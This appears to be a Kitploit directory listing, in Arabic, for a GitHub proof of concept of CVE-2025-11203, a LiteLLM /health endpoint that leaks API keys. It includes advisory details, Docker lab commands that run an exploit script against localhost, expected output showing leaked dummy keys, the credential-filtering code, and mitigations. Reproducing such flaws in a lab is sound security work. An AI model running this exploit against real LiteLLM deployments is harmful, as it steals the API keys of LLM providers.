Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-11203-PoC — الكود الخاص بإعادة إنتاج الثغرة المقابلة شخصيًا | Kitploit
أدوات/GitHubGitHub/learner202649/cve-2025-11203-poc
تحليل الثغرات الأمنيةالاستغلالجمع المعلوماتأمن الويبالتعلم والتعليمأمن واجهات برمجة التطبيقات
GitHublearner202649/cve-2025-11203-poc

CVE-2025-11203-PoC

الكود الخاص بإعادة إنتاج الثغرة المقابلة شخصيًا

عرض المستودع
4منذ 3 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2025-11203 — تسريب مفتاح API لنقطة نهاية الصحة في LiteLLM

LiteLLM (الإصدارات < 1.63.14) عند معالجة معامل api_key في نقطة النهاية /health، لا تقوم بتصفية المعلومات الحساسة بشكل صحيح، مما يسمح للمستخدمين الموثقين بالحصول على مفاتيح API المخزنة في تكوينات النماذج الأخرى. كان من المفترض أن تقوم دالة _clean_endpoint_data() بإزالة حقل api_key ولكن في بعض مسارات الكود يتم تسريبه.

الحقلالقيمة
CVECVE-2025-11203
ZDI IDZDI-25-929 (ZDI-CAN-26585)
CVSS v3.03.5 (منخفض) — AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:N/A:N
CWECWE-200 (كشف معلومات حساسة لمخول غير مصرح له)
متأثرLiteLLM < 1.63.14
تم الإصلاحv1.63.14+ (تطبيق شامل لـ _clean_endpoint_data())
تاريخ النشر2025-10-29
اكتشف بواسطةDavid Fiser & Alfredo Oliveira — Trend Micro Security Research
تاريخ الإبلاغ للبائع2025-03-25
روابطZDI-25-929 • NVD • GHSA-w4vf-cc4x-mpjq

الوصف

نقطة النهاية /health في LiteLLM تُستخدم لإرجاع حالة صحة جميع النماذج المُهيأة. في الظروف العادية، تقوم دالة _clean_endpoint_data() بإزالة الحقول الحساسة (مثل api_key، x-api-key، إلخ) من استجابة فحص الصحة.

ومع ذلك، قبل الإصدار v1.63.14، لم يتم تنفيذ دالة التنظيف هذه أو تم تنفيذها بشكل غير كامل في بعض مسارات الكود، مما أدى إلى إرجاع مفاتيح API من تكوين النموذج كنص عادي في استجابة فحص الصحة.

نقاط النهاية المعرضة

نقطة النهايةالطريقةالوصف
/healthGETإرجاع حالة صحة جميع النماذج
/health/livelinessGETفحص البقاء على قيد الحياة
/health/readinessGETفحص الاستعداد

المعلومات الحساسة المسربة

يمكن للمستخدمين الموثقين الحصول عبر واجهة فحص الصحة على:

  • مفاتيح API لجميع النماذج المُهيأة (OpenAI، Anthropic، Azure، إلخ)
  • معلومات مثل عناوين URL لنقاط نهاية النموذج
  • يمكن استخدام بيانات الاعتماد المخزنة لمزيد من الهجمات

إثبات المفهوم

البدء السريع (Docker)

root@kitploit:~
# 1. تشغيل نسخة LiteLLM الضعيفة
docker compose up -d

# 2. تثبيت التبعيات
pip install -r requirements.txt

# 3. تشغيل سكريبت الاستغلال
python3 exploit/exploit.py --target http://localhost:4000 --key sk-litellm-master-key

# 4. عرض الاستجابة الكاملة
python3 exploit/exploit.py --target http://localhost:4000 --key sk-litellm-master-key --verbose

# 5. (اختياري) التحقق من الإصدار المُصلح
docker compose --profile fixed up -d
python3 exploit/exploit.py --target http://localhost:4001 --key sk-litellm-master-key --fixed

الإخراج المتوقع

root@kitploit:~
======================================================================
[VULNERABLE] CVE-2025-11203 — Health Endpoint API Key Leak
======================================================================
 Target     : http://localhost:4000
 API Key    : sk-litellm-master-key...
 Endpoint   : /health

[*] Step 1: Query /health (this may take ~60s while LiteLLM probes upstream models)...
    HTTP 200 — OK

[*] Step 2: Scanning for leaked credentials...

[🔥] LEAKED CREDENTIALS FOUND: 3 item(s)!

    Path  : unhealthy_endpoints[0].api_key
    Field : api_key
    Value : sk-this-is-a-leaked-openai-key...cdef123456  (len=43)

    Path  : unhealthy_endpoints[1].api_key
    Field : api_key
    Value : sk-another-leaked-key-789012xy...-789012xyz  (len=31)

    Path  : unhealthy_endpoints[2].api_key
    Field : api_key
    Value : sk-ant-anthropic-leaked-key-xx...-key-xxxxx  (len=33)

 Models checked: 3
 Credentials leaked: 3
 [🔥] VULNERABILITY CONFIRMED: API keys exposed via /health!

ملاحظة: تستغرق الخطوة 1 حوالي 60 ثانية لأن LiteLLM يختبر كل نموذج علوي (المفاتيح الوهمية تؤدي إلى انتهاء مهلة كل اتصال). تظهر المفاتيح المسربة تحت unhealthy_endpoints لأن المفاتيح الوهمية لا تستطيع الاتصال فعليًا بـ OpenAI/Anthropic.

الإصدار المُصلح يرفض التسريب:

root@kitploit:~
======================================================================
[FIXED] CVE-2025-11203 — Health Endpoint API Key Leak
======================================================================
    No API keys found in response.
    [+] Expected: keys sanitized by _clean_endpoint_data()

التفاصيل التقنية

الكود المعرض

يقع الثغرة في دالة _clean_endpoint_data() داخل الملف litellm/proxy/health_check.py، والتي تقوم بتصفية الحقول الحساسة مثل api_key عبر قائمة ILLEGAL_DISPLAY_PARAMS:

root@kitploit:~
ILLEGAL_DISPLAY_PARAMS = [
    "messages",
    "api_key",
    "prompt",
    "input",
    "vertex_credentials",
    "aws_access_key_id",
    "aws_secret_access_key",
]

def _clean_endpoint_data(endpoint_data: dict, details: Optional[bool] = True):
    return (
        {k: v for k, v in endpoint_data.items() if k not in ILLEGAL_DISPLAY_PARAMS}
        if details is not False
        else {k: v for k, v in endpoint_data.items() if k in MINIMAL_DISPLAY_PARAMS}
    )

في هذا العرض التوضيحي تمت إزالة "api_key" من قائمة ILLEGAL_DISPLAY_PARAMS باستخدام sed، مما يجعل استجابة /health تعيد تكوين النموذج الأصلي، محاكاةً لحالة تم فيها تجاوز دالة التنظيف في بعض مسارات الكود.

التأثير

  • يمكن للمستخدمين الموثقين ذوي الصلاحيات المنخفضة قراءة مفاتيح API من جميع تكوينات النماذج
  • يمكن استخدام بيانات الاعتماد المسربة لاستدعاء واجهات برمجة تطبيقات مزودي LLM مباشرة
  • قد يؤدي ذلك إلى مزيد من تسريب البيانات والاستيلاء على الحسابات

البيئة

root@kitploit:~
CVE-2025-11203/
├── README.md                    # هذا الملف
├── docker-compose.yml           # LiteLLM الضعيف والمُصلح
├── litellm_config.yaml          # تكوين مع 3 نماذج + مفاتيح API
├── requirements.txt             # تبعيات Python
├── litellm-vuln/
│   └── Dockerfile               # pip install "litellm[proxy]==1.61.0" + التصحيح
├── exploit/
│   └── exploit.py               # سكريبت الاستغلال الرئيسي
├── docs/
│   └── advisory.md
└── screenshots/

الإصلاح

تم إصلاحه في الإصدار v1.63.14، بضمان استدعاء _clean_endpoint_data() بشكل صحيح في جميع مسارات كود فحص الصحة.

إجراءات التخفيف

  1. الترقية إلى LiteLLM v1.63.14+
  2. إذا تعذر الترقية، تقييد الوصول إلى نقطة النهاية /health
  3. مراقبة الوصول غير الطبيعي إلى نقاط نهاية فحص الصحة

المراجع

  • ZDI-25-929
  • NVD Detail
  • GHSA-w4vf-cc4x-mpjq
  • LiteLLM v1.63.14 Release Notes

إخلاء مسؤولية: هذا المحتوى مقدم لأغراض تعليمية واختبار أمني مصرح به فقط.

تنزيل الأداة